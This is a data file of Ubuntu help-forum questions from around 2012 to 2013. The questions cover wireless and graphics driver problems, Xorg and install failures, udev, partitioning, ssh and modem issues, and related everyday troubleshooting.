240616	can you install atheros ath9k driver from 3.2 kernel into 3.5 kernel ?	running ubuntu 12.04 on an acer aspire 5750z with an intel pentium i upgraded the kernel from 3.2.0-35 to 3.5.0-21 to fix a problem with power management ( it would freeze my system when i booted from battery and whenever i unplugged the ac adapter ) and it worked just fine . but.. i started experiencing all sorts of network problems ( slow , dropped connections , froze when turning off wifi , etc.. ) i tried some other kernel changes but all came with the power management problem . my wifi works perfect in the 3.2 kernel is it possible to install the 3.2 kernel ath9k driver into the newer kernel ( 3.5 ) ? ? do you think that will solve the problem ? when i run lshw -c network on the 3.2 kernel , this is what it shows : description : wireless interface product : ar9287 wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 01 serial : c0:18:85:1e:69:13 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.2.0-35-generic firmware=n/a ip=192.168.0.105 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn and on the 3.5 kernel : description : wireless interface product : ar9287 wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 01 serial : c0:18:85:1e:69:13 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.5.0-21-generic firmware=n/a ip=192.168.0.105 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn thanks for the help .
240618	how to improve evince font smoothing ?	i 'm wondering if it is possible to change evince font rendering and make it render fonts like adobe acrobat reader .
240621	how to manage graphics cards ?	i recently installed 12.10 . i have two graphics cards , and integrated intel and a nvidia . is there a way to manage the graphics cards on ubuntu ?
240623	missing volume app from notification area in xubuntu 12.10 panel !	the volume control icon is missing from the panel . the n/w and battery icons are shown . when i try to edit the notification area from the panel preferences i see the volume is not available as a known app . i need help . am a newbie : )
240624	why are n't new programs showing up in the kde menu ?	i have run into a very odd problem in kubuntu 12.10 . whenever i add a program through muon or `apt-get` , it does n't show up in the menu . for example , i installed opera from a deb package and code : :blocks from the repositories , and neither of them are in the menu . i can open them from the command line . i opened kmenuedit , and they were n't there . i tries adding them , but when i pressed save , it said it was updating the configuration . whenever the progress bar reached 90 % , it reset to 0 % . here is the output in the termnal : kmenuedit ( 18316 ) /kdecore ( services ) kserviceprivate : :init : the desktop entry file `` /home/andrew/.local/share/applications/opera.desktop '' has type= `` application '' but no exec line could not resolve property : pattern6664 could not resolve property : lineargradient4636 could not resolve property : lineargradient4592 could not resolve property : lineargradient4247 could not resolve property : lineargradient11897 could not resolve property : lineargradient11897 could n't create image from `` '' could not resolve property : lineargradient5167 if i view opera.desktop , the exec line is exec=opera . i am using kde 4.9.5 from the kubuntu-ppa/ppa repository . edit my /home/andrew/.local/share/applications/opera.desktop looks like this : [ desktop entry ] comment= exec=opera genericname=web browser icon=opera-browser name=opera nodisplay=false path [ $ e ] = startupnotify=true terminal=0 terminaloptions= type=application x-kde-substituteuid=false x-kde-username= and my /usr/share/applications/opera-browser.desktop looks like this : [ desktop entry ] type=application version=1.0 name=opera genericname=web browser genericname [ bs ] =web preglednik genericname [ de ] =web-browser genericname [ eo ] =ttt-rigardilo genericname [ es ] =navegador web genericname [ et ] =veebibrauser genericname [ eu ] =web arakatzailea genericname [ fi ] =www-selain genericname [ fr ] =un navigateur web genericname [ is ] =vafri genericname [ it ] =browser web genericname [ nb ] =nettleser genericname [ nl ] =webbrowser genericname [ nn ] =nettlesar genericname [ pt ] =navegador web genericname [ pt_br ] =navegador genericname [ ro ] =navigator de web genericname [ ru ] =веб-браузер genericname [ sl ] =spletni brskalnik genericname [ ven ] =buronza ya webu genericname [ xh ] =umkhangeli zincwadi zokubhaliweyo genericname [ zu ] =umkhangeli zincwadi we web comment=fast and secure web browser and internet suite icon=opera-browser tryexec=/usr/bin/opera exec=/usr/bin/opera % u terminal=false mimetype=text/html ; text/xml ; application/xhtml+xml ; text/vnd.wap.wml ; text/wml ; application/x-mimearchive ; application/mime ; application/xml ; application/rss+xml ; application/rdf+xml ; image/svg+xml ; application/x-opera-extension ; x-scheme-handler/http ; x-scheme-handler/https ; x-scheme-handler/ftp ; x-scheme-handler/mailto ; video/ogg ; audio/ogg ; video/webm ; image/webp ; categories=network ; webbrowser ; startupnotify=true x-appinstall-package=opera
240626	downloading a previously purchased app with ubuntu software center	fresh install of ubuntu 12.10 but i want to claim a purchase of minecraft that i bought with the old install using ubuntu software center . do n't see an intuitive way of downloading your purchased items . i have the email payment confirmation . any advice ?
240627	graphic card drivers installation in lubuntu 12.10 ?	i am using lubuntu 12.10 , i want install the drivers for my hybrid graphic card because my laptop fan is always running and produces great amount of heat . graphic card specification : - 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati caicos [ radeon hd 6400m/7400m series ] well , i followed this correct way to install ati video drivers i got some errors ; please find fglrx-install.log : - ankit @ ankit-hp-pavilion-g6-notebook-pc : /tmp $ tail -1000 /usr/share/ati/fglrx-install.log check if system has the tools required for installation . uninstalling any previously installed drivers . creating symlink /var/lib/dkms/fglrx/8.98/source - > /usr/src/fglrx-8.98 dkms : add completed . kernel preparation unnecessary for this kernel . skipping ... building module : cleaning build area ... . cd /var/lib/dkms/fglrx/8.98/build ; sh make.sh -- nohints -- uname_r=3.5.0-17-generic -- norootcheck ... .. ( bad exit status : 1 ) [ error ] kernel module : failed to build fglrx-8.98 with dkms [ error ] kernel module : removing fglrx-8.98 from dkms -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- deleting module version : 8.98 completely from the dkms tree . -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
240629	setting up ushare ( xbox 360 file sharing )	i recently tried installing ushare so i could share media between my laptop and xbox . could someone direct me as to how to change the settings so it can be recognized by my xbox . ushare.conf file : ushare_dir=/home/travis/music , /home/travis/videos ushare_enable_xbox=yes ushare_enable_dlna=yes ushare_iface=wlan0 every time i start the process running the command sudo service ushare start i get a crash report . if there is a way to copy this crash report tell me so i can post it . executablepath : /usr/bin/ushare package : ushare 1.1a-0ubuntu9 title : ushare crashed with sigsrgv in avformat_open_input ( )
240630	ubuntu 12.10 install wont let me install alongside windows 7	i decided today to try out ubuntu 12.10 , and want to install on my computer alongside windows 7 . i am new to the whole thing and have never even partitioned a hard drive and before i go changing partitions on my drive i want to make sure i am doing things properly . i am going into install and the option install alongside windows is not available and it only gives me the something else option for advanced users , and completely erasing my windows os and installing ubuntu ( which i do n't want to do ) . any suggestions or help with this please ?
240631	ubuntu 12.04.1 xserver problems	i have a problem with xserver on my laptop . ubuntu 12.04.1 is installed . first , i can boot only in terminal mode . when i try to start xserver with command startx it fails . lspci | grep vga output : 01:05.0 vga compatible controller : advanced micro devices [ amd ] nee ati radeon xpress 1250 xorg.0.log : [ 3947.214 ] x.org x server 1.11.3 release date : 2011-12-16 [ 3947.223 ] x protocol version 11 , revision 0 [ 3947.226 ] build operating system : linux 2.6.42-26-generic i686 ubuntu [ 3947.228 ] current operating system : linux argentum 3.2.0-35-generic # 55-ubuntu smp wed dec 5 17:45:18 utc 2012 i686 [ 3947.228 ] kernel command line : boot_image=/boot/vmlinuz-3.2.0-35-generic root=uuid=4ef621ed-26dd-46fd-80bc-b04ad5f18990 ro quiet splash vt.handoff=7 [ 3947.232 ] build date : 29 august 2012 12:10:05am [ 3947.235 ] xorg-server 2:1.11.4-0ubuntu10.8 ( for technical support please see http : //www.ubuntu.com/support ) [ 3947.237 ] current version of pixman : 0.24.4 [ 3947.241 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 3947.241 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 3947.251 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : sat jan 12 22:16:17 2013 [ 3947.253 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 3947.253 ] ( == ) no layout section . using the first screen section . [ 3947.253 ] ( == ) no screen section available . using defaults . [ 3947.253 ] ( ** ) | -- > screen `` default screen section '' ( 0 ) [ 3947.253 ] ( ** ) | | -- > monitor `` '' [ 3947.254 ] ( == ) no monitor specified for screen `` default screen section '' . using a default monitor configuration . [ 3947.254 ] ( == ) automatically adding devices [ 3947.254 ] ( == ) automatically enabling devices [ 3947.254 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 3947.254 ] entry deleted from font path . [ 3947.254 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/100dpi/ : unscaled , /usr/share/fonts/x11/75dpi/ : unscaled , /usr/share/fonts/x11/type1 , /usr/share/fonts/x11/100dpi , /usr/share/fonts/x11/75dpi , /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype , built-ins [ 3947.254 ] ( == ) modulepath set to `` /usr/lib/i386-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 3947.254 ] ( ii ) the server relies on udev to provide the list of input devices . if no devices become available , reconfigure udev or disable autoadddevices . [ 3947.254 ] ( ii ) loader magic : 0x5475a0 [ 3947.254 ] ( ii ) module abi versions : [ 3947.254 ] x.org ansi c emulation : 0.4 [ 3947.254 ] x.org video driver : 11.0 [ 3947.254 ] x.org xinput driver : 16.0 [ 3947.254 ] x.org server extension : 6.0 [ 3947.255 ] ( -- ) pci : * ( 0:1:5:0 ) 1002:7942:144d : c034 rev 0 , mem @ 0xd0000000/134217728 , 0xd8000000/65536 , i/o @ 0x00009000/256 [ 3947.255 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 3947.255 ] ( ii ) loadmodule : `` extmod '' [ 3947.256 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libextmod.so [ 3947.256 ] ( ii ) module extmod : vendor= '' x.org foundation '' [ 3947.256 ] compiled for 1.11.3 , module version = 1.0.0 [ 3947.256 ] module class : x.org server extension [ 3947.256 ] abi class : x.org server extension , version 6.0 [ 3947.256 ] ( ii ) loading extension mit-screen-saver [ 3947.256 ] ( ii ) loading extension xfree86-vidmodeextension [ 3947.256 ] ( ii ) loading extension xfree86-dga [ 3947.256 ] ( ii ) loading extension dpms [ 3947.256 ] ( ii ) loading extension xvideo [ 3947.256 ] ( ii ) loading extension xvideo-motioncompensation [ 3947.256 ] ( ii ) loading extension x-resource [ 3947.256 ] ( ii ) loadmodule : `` dbe '' [ 3947.256 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdbe.so [ 3947.256 ] ( ii ) module dbe : vendor= '' x.org foundation '' [ 3947.256 ] compiled for 1.11.3 , module version = 1.0.0 [ 3947.256 ] module class : x.org server extension [ 3947.256 ] abi class : x.org server extension , version 6.0 [ 3947.256 ] ( ii ) loading extension double-buffer [ 3947.256 ] ( ii ) loadmodule : `` glx '' [ 3947.257 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libglx.so [ 3947.257 ] ( ii ) module glx : vendor= '' advanced micro devices , inc. '' [ 3947.257 ] compiled for 6.9.0 , module version = 1.0.0 [ 3947.257 ] ( ii ) loading extension glx [ 3947.257 ] ( ii ) loadmodule : `` record '' [ 3947.258 ] ( ii ) loading /usr/lib/xorg/modules/extensions/librecord.so [ 3947.258 ] ( ii ) module record : vendor= '' x.org foundation '' [ 3947.258 ] compiled for 1.11.3 , module version = 1.13.0 [ 3947.258 ] module class : x.org server extension [ 3947.258 ] abi class : x.org server extension , version 6.0 [ 3947.258 ] ( ii ) loading extension record [ 3947.258 ] ( ii ) loadmodule : `` dri '' [ 3947.258 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri.so [ 3947.258 ] ( ii ) module dri : vendor= '' x.org foundation '' [ 3947.258 ] compiled for 1.11.3 , module version = 1.0.0 [ 3947.258 ] abi class : x.org server extension , version 6.0 [ 3947.258 ] ( ii ) loading extension xfree86-dri [ 3947.258 ] ( ii ) loadmodule : `` dri2 '' [ 3947.258 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri2.so [ 3947.259 ] ( ii ) module dri2 : vendor= '' x.org foundation '' [ 3947.259 ] compiled for 1.11.3 , module version = 1.2.0 [ 3947.259 ] abi class : x.org server extension , version 6.0 [ 3947.259 ] ( ii ) loading extension dri2 [ 3947.259 ] ( == ) matched fglrx as autoconfigured driver 0 [ 3947.259 ] ( == ) matched ati as autoconfigured driver 1 [ 3947.259 ] ( == ) matched vesa as autoconfigured driver 2 [ 3947.259 ] ( == ) matched fbdev as autoconfigured driver 3 [ 3947.259 ] ( == ) assigned the driver to the xf86configlayout [ 3947.259 ] ( ii ) loadmodule : `` fglrx '' [ 3947.259 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fglrx_drv.so [ 3947.283 ] ( ii ) module fglrx : vendor= '' firegl - ati technologies inc. '' [ 3947.283 ] compiled for 1.4.99.906 , module version = 8.95.3 [ 3947.283 ] module class : x.org video driver [ 3947.284 ] ( ii ) loading sub module `` fglrxdrm '' [ 3947.284 ] ( ii ) loadmodule : `` fglrxdrm '' [ 3947.284 ] ( ii ) loading /usr/lib/xorg/modules/linux/libfglrxdrm.so [ 3947.284 ] ( ii ) module fglrxdrm : vendor= '' firegl - ati technologies inc. '' [ 3947.284 ] compiled for 1.4.99.906 , module version = 8.95.3 [ 3947.284 ] ( ii ) loadmodule : `` ati '' [ 3947.285 ] ( ww ) warning , could n't open module ati [ 3947.285 ] ( ii ) unloadmodule : `` ati '' [ 3947.285 ] ( ii ) unloading ati [ 3947.285 ] ( ee ) failed to load module `` ati '' ( module does not exist , 0 ) [ 3947.285 ] ( ii ) loadmodule : `` vesa '' [ 3947.285 ] ( ww ) warning , could n't open module vesa [ 3947.285 ] ( ii ) unloadmodule : `` vesa '' [ 3947.285 ] ( ii ) unloading vesa [ 3947.285 ] ( ee ) failed to load module `` vesa '' ( module does not exist , 0 ) [ 3947.285 ] ( ii ) loadmodule : `` fbdev '' [ 3947.286 ] ( ww ) warning , could n't open module fbdev [ 3947.286 ] ( ii ) unloadmodule : `` fbdev '' [ 3947.286 ] ( ii ) unloading fbdev [ 3947.286 ] ( ee ) failed to load module `` fbdev '' ( module does not exist , 0 ) [ 3947.286 ] ( == ) matched fglrx as autoconfigured driver 0 [ 3947.286 ] ( == ) matched ati as autoconfigured driver 1 [ 3947.286 ] ( == ) matched vesa as autoconfigured driver 2 [ 3947.286 ] ( == ) matched fbdev as autoconfigured driver 3 [ 3947.286 ] ( == ) assigned the driver to the xf86configlayout [ 3947.286 ] ( ii ) loadmodule : `` fglrx '' [ 3947.286 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fglrx_drv.so [ 3947.286 ] ( ii ) module fglrx : vendor= '' firegl - ati technologies inc. '' [ 3947.286 ] compiled for 1.4.99.906 , module version = 8.95.3 [ 3947.286 ] module class : x.org video driver [ 3947.286 ] ( ii ) loadmodule : `` ati '' [ 3947.287 ] ( ww ) warning , could n't open module ati [ 3947.287 ] ( ii ) unloadmodule : `` ati '' [ 3947.287 ] ( ii ) unloading ati [ 3947.287 ] ( ee ) failed to load module `` ati '' ( module does not exist , 0 ) [ 3947.287 ] ( ii ) loadmodule : `` vesa '' [ 3947.287 ] ( ww ) warning , could n't open module vesa [ 3947.287 ] ( ii ) unloadmodule : `` vesa '' [ 3947.287 ] ( ii ) unloading vesa [ 3947.287 ] ( ee ) failed to load module `` vesa '' ( module does not exist , 0 ) [ 3947.287 ] ( ii ) loadmodule : `` fbdev '' [ 3947.288 ] ( ww ) warning , could n't open module fbdev [ 3947.288 ] ( ii ) unloadmodule : `` fbdev '' [ 3947.288 ] ( ii ) unloading fbdev [ 3947.288 ] ( ee ) failed to load module `` fbdev '' ( module does not exist , 0 ) [ 3947.288 ] ( ii ) ati proprietary linux driver version identifier:8.95.3 [ 3947.288 ] ( ii ) ati proprietary linux driver release identifier : 8.951 [ 3947.288 ] ( ii ) ati proprietary linux driver build date : mar 8 2012 23:06:36 [ 3947.288 ] ( -- ) using vt number 7 [ 3947.293 ] ( ww ) falling back to old probe method for fglrx [ 3947.293 ] ( ee ) unable to initialize pcs database [ 3947.293 ] ( ee ) missing pcs defaults file /etc/ati/amdpcsdb.default [ 3947.293 ] ( ee ) no devices detected . [ 3947.293 ] fatal server error : [ 3947.293 ] no screens found [ 3947.293 ] please consult the the x.org foundation support at http : //wiki.x.org for help . [ 3947.293 ] please also check the log file at `` /var/log/xorg.0.log '' for additional information . [ 3947.293 ] seems , that i have a problem with amd/ati drivers . is it possible to fix it ? thanks .
240632	how to disable udev net rule generation ?	in our cloud , we generate macs with the prefix 2c : c2:60 for instances . when we re-use an instance , or duplicate it , the new copy gets another mac address . when the new copy boots , the nic gets the name eth1 due to the new mac . i see that in /lib/udev/rules.d/75-persistent-net-generator.rules , there are rules for known prefixes such as 52:54:00 ( kvm ) and vmware ( 00:0c:29 ) . but this file should not be edited as stated in its first line . we would like to use our own registered mac prefix and not others ' ones . how to disable net rules generation completely ?
240633	i want to extend my partition	i am currently dual booting windows 7 and ubuntu 12.10 . i have 500gb with 300gb free space on my windows , and have a 100gb on my ubuntu . i want to move 200gb from my windows partition to my ubuntu partition . please help . thanks .
240636	how to get samba4 installed . having compiling errors	i have ubuntu 12.04 server installed . i followed the install instructions for samba ( samba ad dc howto ) copied from sambawiki website . i only got to step 2 which is compile samba and received an error . i have the c compiler loaded and it working . i am getting errors that there are several files not copied to my server . can anyone help me with this . thanks in advance glynn
240642	require duplicates to be imported in shotwell	i have some drawings that i have imported and tagged by date . now i want to take some of them that i have organized on my disk and put give them a new tag . shotwell thinks they are duplicates and wo n't import them . is there a way to require shotwell to import these duplicates ?
240645	how to login from putty to xubuntu	i have a cloud server which is running ubuntu server . i have connected to the server with putty . i have installed xubuntu and gdm but do not know how to login into xubuntu from putty terminal . any help ?
240646	could i make ubuntu a rolling distro ?	from what i understand , debian testing/unstable/experimental are rolling release , right ? since ubuntu is based on debian , could i the debian testing repo to my software sources and make my ubuntu a rolling release ? would that be possible and how would i add debian to my sources ? if it were possible , does that mean when ubuntu 13.04 comes out , i would n't have to upgrade as my computer is already up to date ? unity stuff does n't matter to me , i use gnome remix .
240647	how to pause an application when minimizing a window ?	i 'm following an excel video-course on my pc , so i need to have both excel and the video-course program opened in two different windows to switch from one to another . i was wondering if there is a way to automatically pause the application running the video-course when i have to minimize its window to work on excel sheet . in general , can ubuntu 12.10 allow to automatically suspend/pause/freeze an application when clicking on the 'minimize window ' button ?
240656	problem with installation of ubuntu after after changing my video card with an amd hd 6570	after changing my video card to amd hd 6570 it 's not possible to install ubuntu anymore on windows ( 8 ) , everything is just fine . my new video card works perfectly and i have no problem with anything about it . then when i try to boot from ubuntu ( or any other linux ) to install it with wubi or with usb everything goes like this : 1 ) grub screen ... no problem at all , colors are just fine everything looks okay 2 ) and then ubuntu 's boot screen ... weird background color , over the backround there are vertical stripes of red-orange dots . 3 ) desktop is about to start but * vertical stripes of red colored dots are all over the unity screen* . then when i click on ubuntu 's menu , it usually switches to black screen saying something about `` panic occured '' ... and then it restarts or it gives no respond at all . problems started after i started using amd hd 6570 video card on my asus m5a78lm-lx mainboard which has amd phenom ii x4 processor on it . again , i 'm writing on windows 8 right now and everything works and looks perfect . so far i 've only updated bios . on virtual box ubuntu works fine .
240657	make web pages act like unity apps	is thee a way to make web pages act like apps ? what i want to do is to split many chromium pinned tabs into apps . so , for example , i have 2 gmail accounts , 2 tabs in chromium , and i want separate chromium instance with gmail icon in launcher , so i can easily switch to it . i want to do similar thing for twitter , google reader ...
240665	ubuntu ssh client not connecting to vps , however putty is ?	i am using ubuntu on my laptop , and am trying to ssh into my vps with this command : ssh root @ liamwli.co.uk -p xxxx ( port removed for security ) it does n't connect however . if i add the -vvv command , i get this : openssh_6.0p1 debian-3ubuntu1 , openssl 1.0.1c 10 may 2012 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug2 : ssh_connect : needpriv 0 debug1 : connecting to liamwli.co.uk [ 69.85.86.19 ] port xxxx . debug1 : connect to address 69.85.86.19 port xxxx : connection timed out ssh : connect to host liamwli.co.uk port xxxx : connection timed out why is it doing this ? it works fine , and connects using putty on my windows installation , so why does n't it work using the built in ssh client on ubuntu ?
240666	the 3g usb modem can connect sometimes , sometimes not	problem : the netbook can sometimes , sometimes not , connect to the internet mobile broadband 3g ( or 2g gsm ) via usb 3g modem . for it to connect to mobile broadband ( when it can ) i have , after sticking the modem into the usb port , and then enter the shell prompt with the command : / sys/bus/usb-serial/drivers/option1/new_id then i have to restart the network-manager : service network-manager restart the shell reports the number xxxx this process . entering the command : ps aux then , i annotate the number yyyy of the process /sys/sbin/modem-manager then i change the priority of these two processes for priority for maximum priority : renice -20 xxxx yyyy so , sometimes , i get a 3g connection . i do not know if he can connect on 2g ( gsm ) , but it seems to me that when the connection changes from 3g to gsm she soon falls - but i am not sure . when the connection is not achieved , the modem-manager is constantly trying . it can be seen that through the connection icon in the upper right side of the screen . yesterday , saturday 12/jan/2012 i tried to connect to the internet and could not . the system detected an error and asked me if i wanted to send an error message . i accepted , but as i was not connected to the internet , i copied the details of the problem . today , sunday 13/jan/2012 i got the connection and i sent you the error report . the error details are below ( may have some copy error because the report is very large ) : executable path /usr/sbin/modem-manager package modemmaneger 0.5.2.0ubuntu2 problem type crash title modem-manager crashed with sigsegv in molloc ( ) apportversion 2.0.1-0ubuntu15.1 architeture i386 coredump crashcounter 1 date sat jan 12 08:28:36 2013 dependencies disassembly distrorelease ubuntu 12.04 installationmedia ubuntu 12.04 lts “precise pangolin” - release i386 ( 20120817. . . . . markforupload true packagearchiteture i386 proccndline /usr/sbin/modem-manager procenviron path= ) custon , no user ) term=linux procmaps procstatus procversionsignature ubuntu 3.2.0-35.55 – generic-pae 3.2.34 registers segvanalysis segfault happened at : 0xb745b1b7 : cmp 0x8 ( % edx ) , % ecx pc ( 0xb745b1b7 ) ok source”0x8 ( % edx ) ” ( 0x3f47455a ) not located in a know vma region ( need readable region ) ! destination” % ecx” ok segvreason reading unknown vma signal 11 sourcepackage modemmanager stacktrace stacktracetop tags precise threadstacktrace uname linux 3.2.0-35-generic-pae i686 upgradestatus no uppgrade log present ( propably fresh install ) usergroups
240667	remove ubuntu from dual boot windows 8 pc	i have recently upgraded to windows 8 and want to remove my ubuntu os . it was installed using a bootable pen drive . i tried deleting ubuntu partition but after that the screen remained blank . i had to reinstall ubuntu to get rid of that .
240669	failed to install ubuntu 12.10 on asrock h77 pro4/mvp with uefi bios	i want to install the ubuntu 12.10 or 12.04 desktop for my new pc . steps : i created a bootable usb , config the bios to boot from the usb drive . press `` try ubuntu before you install it '' ubuntu 12.10 and 12.04 on my new desktop , it is failed . what i tried after failed : 1 . i have tested the usb drive image without any error . 2 . there are guys suggested to disable secure boot for uefi bios , tried but failed . 3 . i tried pressing f2 to see the log , it shown as below generating localed ... . done and the process is hanged . can anyone give me some advice ? thank you ! config : mb : asrock h77 pro4/mvp cpu : xeon e3 1245 try then install , coz people recommended that try ubuntu before installation . it can make sure ubuntu run on your desktop . to luis alvarado : i read the recommended post ( to disable secure boot ) , still cant solve my problems
240670	how may i improve my boot / shutdown time ?	i have a pretty decent laptop ( intel core i7-3520m cpu @ 2.90ghz , sataii ssd from samsung , 8gb ram ) , but i not satisfied with my boot and shutdown times ... i have installed bootchart , and am trying to interpret it , but i do n't understand some parts . in particular , i do n't get what is happening during the first 10 seconds , when there is almost no cpu utilization , nor i/os . what is happening then ? ( there seem to be only udevd , modprobe and plymouth running ) . on the other end of my daily work , i also experiente slow shutdown . no shotdown chart here , so i 'm even more clueless ... update i have come accross a hint saying hitting the up key while shutting down gives access to the console ( i had been fighting with f1 / alt f1 before that ) . so i have seen that the long shutdown time seems to have to do with rpcbind and modem-manager being unable to quit cleanly ... any idea ? update 2 i have uninstalled rpcbind , as well as modemmanager . this made things better for shutdown , but i still have several seconds waiting between the 'all processes ended within 1 seconds ' message , and the real shutdown . just then , i get a quick message i was unable to read yet , but i suspect some sort of timeout to occur ... update 3 ok , i think i have narrowed things down to the execution of resume and wait-for-root during the first 10 seconds of the boot process . this is taking more than 5 secs , with no disk nor noticable cpu activity . i noticed that swap uuid in /etc/initramfs/conf.d/resume does not match with the real uuid of my swap partition , which happens to be ... crypted . maybe that is the point ? any hint on initramfs-tools and cryptswap ?
240672	can ubuntu be used with an alternative to udev ( reason increased boot speed ) ?	i think that udev can be a wonderful thing , since it really manages that the same ubuntu system will boot up on virtually `` every '' ( * ) hardware setup . so i do really apreciate udev . still i think it is regretable that with each boot-up process i have to have my pc `` rediscover itslef '' and by this `` waste bootup-speed '' to udev . now as i see it , there linux setups that work without udev and the device nodes in /dev/ are there statically/permanently created via mknod . while this approach would certainly make such a setup `` not being able to run on different hardware '' it would though reduce the `` overhead '' and `` time-waste '' done with udev being used to `` rediscover my hardware each and every boot-up '' so my question here . can i switch from udev to creating permanent device nodes created via mknod ? what could be the drawbacks ? is there some reason this would not and never work with an ubuntu system ? the idea is to some extend derived from here and hence i am unsure if this approach which seems to be indicated for an arch linux can also work for ubuntu . i mean i would really like this `` hybrid approach '' ( static devicenodes for boot - udev started later for flash-disk plug-and-play fun ) .
240688	remote desktop solution working with ubuntu 12.04 + unity ( 3d ) ?	i 'm trying to install a remote desktop solution on some clients using ubuntu with unity ( 3d ) . i 've uninstalled unity2d because it behaves not very well . xrdp wo n't work , only the wallpaper is shown . the same goes for freenx-server . the only servers that seems to work properly are the vnc-based as vino . right , vnc is okay , but it is a bit slow . also , vino is not enough . clients can only connect if they have manually configured the vino server , and they ca n't connect if the session is closed . sure , i could install a vnc server that launched a daemon at startup , but i want the clients to login with their credentials , and , for example , tightvncserver , only gets a global password as far as i know . perhaps it 's possible to open lightdm from a tightvncserver session ? there are two possible scenarios : a session is started and the client should attach to the current session . a session is not started , and the client should start a new one . better if the client can logout and reattach to that session later , locally or remotely .
240689	can not update/edit any file	hello friends i can not update any file under the file system . it says you do not have permissions . i tried to edit files using gedit but it gives me this error ... how can i update files in the file system . i am the admin . thanks
240698	ubuntuone api - developing a perl module to use it	i 'm developing a perl module to work with the ubuntuone 's api . 1 ) i 'm able to retrieve the name , consumer key , consumer secret , token and token secret values using the basic http authentication and json parser . 2 ) with these data , the api-doc says that i should do a get to https : //one.ubuntu.com/oauth/sso-finished-so-get-tokens/ i get : ok 0/20 anybody knows what it means ? 3 ) finally , when i try to use the api i receive a http/1.1 401 unauthorized : - ( any ideas ?
240700	how can i change the icon of a unity web app ?	i installed the tumblr web app but the icon looks horrible . i was wondering if there is any way to change it to a nicer looking one . i 've tried changing the icon in the .icons folder but it always seems to revert back to the usual horrible one .
240702	wget a series of files in order	how do you download a series of files with wget like so : http : //www.example.com/index.php ? file=1 http : //www.example.com/index.php ? file=2 http : //www.example.com/index.php ? file=3 ... http : //www.example.com/index.php ? file=500
240709	guest ubuntu can not connect to the internet on virtualbox , bridged	i have few vms with ubuntu 12.04 nad 12.10 and i 'm using them in different networks ( at home and at work ) . at work i 'm using wireless connection and at home i have cable . i 'm using bridged mode and ubutnu ca n't handle it very well , because sometimes vm gets ip address , but i ca n't ping anything in the internet or even in my local network network . both cards support bridged mode . host is windows 7 64bts . vms are also 64 bits . sometimes when i 'll reboot vm , everything seems ok. any tips ? edit : i 'm starting ubutnu vm at work and internet connection is working . everything is fine . bridged adapter is wireless card . i 'm going home and launch this same machine , but before that i change bridge adapter to my cable network card . vm gets ip address , everything seems ok , besides network is not working . i ca n't even ping my router and i got ip from it ( dhcp ) .
240712	ubuntu not mounting any external drive	it 's not mounting anything , i 've tried many usb drives , memory cards etc . so i ca n't backup my data , its more than 10gb so i 'm not thinking of any online backup . at the boot time , while checking for errors in drives , an error message occurs - mnt/sdb not found . user not found and when i mount the usb drive after the boot it says-'operation not successful ' ( automatic mounting ) . when i change its mount settings , it says `` wrong fs type , bad option , bad superblock on /dev/sdb '' when i saw the usb folder inside the mnt folder , it was empty . if anyone knows which path to choose in the disk drive settings or the command of manual mounting it would be very helpful
240714	can you run ubuntu server from a desktop computer ?	i dont have an actual server , am i able to run ubuntu server 12.10 on a desktop computer ?
240723	how will ubuntu affect the battery life of my galaxy nexus ?	i have a galaxy nexus , i would like to install and try out ubuntu on it when the os comes out . one of the aspects i have not seen covered in any reviews or demos so far is battery life . how will the ubuntu os affect my battery life on the galaxy nexus ? will it improve or become worse ...
240724	how to config and compile kernel	i know i can download new and stable kernels from kernel.org but i do n't know how to config , compile and install it . of course there is a document file in kernel folder . but that text is very complex for me and it is n't useful to teach me . help me please to do that .
240725	how to take a screenshot of a fullscreen video ?	when i watch some movie , in fullscreen , i would like to make wallpapers for myself . unfortunately , in fullscreen , i try to press prtscn , then the fullscreen closes , after which it takes the shot . i already tried shutter , but i would like a software which will take a screenshot , using hot keys . i would be glad , if you could answer the question
240727	how does ubuntu handle multiple installations of software ?	i 'm a recent convert from windows to linux and i have a question about how ubuntu/linux takes care of duplications of files when installing software gets messy . to use an example , let me talk about something i 'm having problems with right now ; installing ruby on rails . at some point in downloading it there was an error ( not relevant to this thread ) and to solve it i went back to the beginning of the installation and ran all of the required steps , re-downloading much of what i had already downloaded . i 'm used to windows just clogging everything up with duplicated files , and my sense is that ubuntu is smarter than that . how does ubuntu handle a user downloading multiple things ? before each installation does it check to see if some key file is already located within the system , and if it is , it does n't download any of the files ? in terminal i 've never received a message from the system saying something along the lines of , '' user alex has already downloaded this package '' which is what i would expect . i would really like a detailed but non-technical explanation of what 's going on here .
